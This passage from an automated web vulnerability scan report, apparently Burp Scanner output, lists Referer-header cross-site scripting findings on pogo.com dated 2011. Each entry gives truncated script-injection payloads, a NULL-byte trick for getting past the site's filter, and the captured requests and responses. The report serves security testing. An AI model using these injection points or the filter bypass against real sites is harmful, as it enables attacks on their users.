HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:59:44 GMT Server: Apache-Coyote/1.1 Content-Length: 35542 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... kTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_homnav s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated" ...[SNIP]... |
3.674. http://www.pogo.com/action/pogo/lightreg.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/lightreg.do |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936a3</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogo/lightreg.do Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Origin: http://www.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:00:17 GMT Server: Apache-Coyote/1.1 Content-Length: 37723 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_header s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; ...[SNIP]... |
3.675. http://www.pogo.com/action/pogo/lightregview.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/lightregview |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9e92</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogo/lightregview Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:00:21 GMT Server: Apache-Coyote/1.1 Content-Length: 35353 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.676. http://www.pogo.com/action/pogop/welcome.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogop/welcome.do |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65815</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogop/welcome.do Host: www.pogo.com Proxy-Connection: keep-alive Referer: 65815</script><script Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:00:34 GMT Server: Apache-Coyote/1.1 Content-Length: 35382 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... ackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="65815</script><script s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.677. http://www.pogo.com/all-games [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /all-games |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a6d4a</scriptThis behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /all-games HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:58:54 GMT Server: Apache-Coyote/1.1 Content-Length: 107549 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - allgames"; s.prop2="pogo"; s.channel="games"; s.prop7="POGO:games ...[SNIP]... |
3.678. http://www.pogo.com/board-games [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /board-games |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a15ff</script><aThis behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /board-games?pageSection Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:59:58 GMT Server: Apache-Coyote/1.1 Content-Length: 106225 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - board"; s.prop2="pogo"; s.channel="games"; s.eVar18="un_footer_board s.prop7="POGO:games ...[SNIP]... |
3.679. http://www.pogo.com/board-games [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /board-games |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0015f3c</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /board-games?pageSection Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 500 Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html Date: Sun, 09 Jan 2011 02:00:18 GMT Server: Apache-Coyote/1.1 Connection: close Content-Length: 3952 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Web Page Problem </tit ...[SNIP]... linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Web Page Problem Page"; s.prop2="pogo"; s.channel="games"; s.eVar18="un_categorybar s.prop7="POGO:games:error ...[SNIP]... |
3.680. http://www.pogo.com/games/connect.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /games/connect.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea44</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /games/connect.jsp?game Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: com.pogo.nsc=age.:sort |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:41:11 GMT Server: Apache-Coyote/1.1 Content-Length: 36249 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.eVar30="SOsub_test s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated" ...[SNIP]... |
3.681. http://www.pogo.com/home/home.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /home/home.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c8dc</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /home/home.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=0C9E45856B3 Content-Language: en-US Set-Cookie: com.pogo.unid=660641 Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:20:37 GMT Server: Apache-Coyote/1.1 Content-Length: 429503 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Free Pogo Home Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:: s.prop8="Non Authenticated"; if (typeof ...[SNIP]... |
3.682. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/homepage |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c590</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /hotdeploy/us/homepage Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 03:00:42 GMT Server: Apache-Coyote/1.1 Content-Length: 26755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-e ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ClubPogo.com 5by5 0708 US page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo s.prop8="Non Authentic ...[SNIP]... |
3.683. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/promotions |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7be6</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /hotdeploy/us/promotions Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:52:21 GMT Server: Apache-Coyote/1.1 Content-Length: 20201 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Boys & Girls Clubs of America"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo s.prop8="Non Authenticat ...[SNIP]... |
3.684. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/promotions |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f536</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /hotdeploy/us/promotions Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:52:30 GMT Server: Apache-Coyote/1.1 Content-Length: 21378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Co ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo iPhone Landing Page"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_homnav s.prop7="POGO:pogo s.pro ...[SNIP]... |
3.685. http://www.pogo.com/hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2 [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/promotions |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0766</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /hotdeploy/us/promotions Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble Referer: http://www.google.com |
Response
HTTP/1.1 404 /hotdeploy/us/promotions Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 03:00:26 GMT Server: Apache-Coyote/1.1 Content-Length: 3799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof( ...[SNIP]... |
3.686. http://www.pogo.com/img/prize/en_US/cash-giveaway [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /img/prize/en_US/cash |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da67</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /img/prize/en_US/cash Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response
HTTP/1.1 404 /img/prize/en_US/cash Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:52:10 GMT Server: Apache-Coyote/1.1 Content-Length: 3799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof( ...[SNIP]... |
3.687. http://www.pogo.com/login/entry.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /login/entry.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7abe6</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
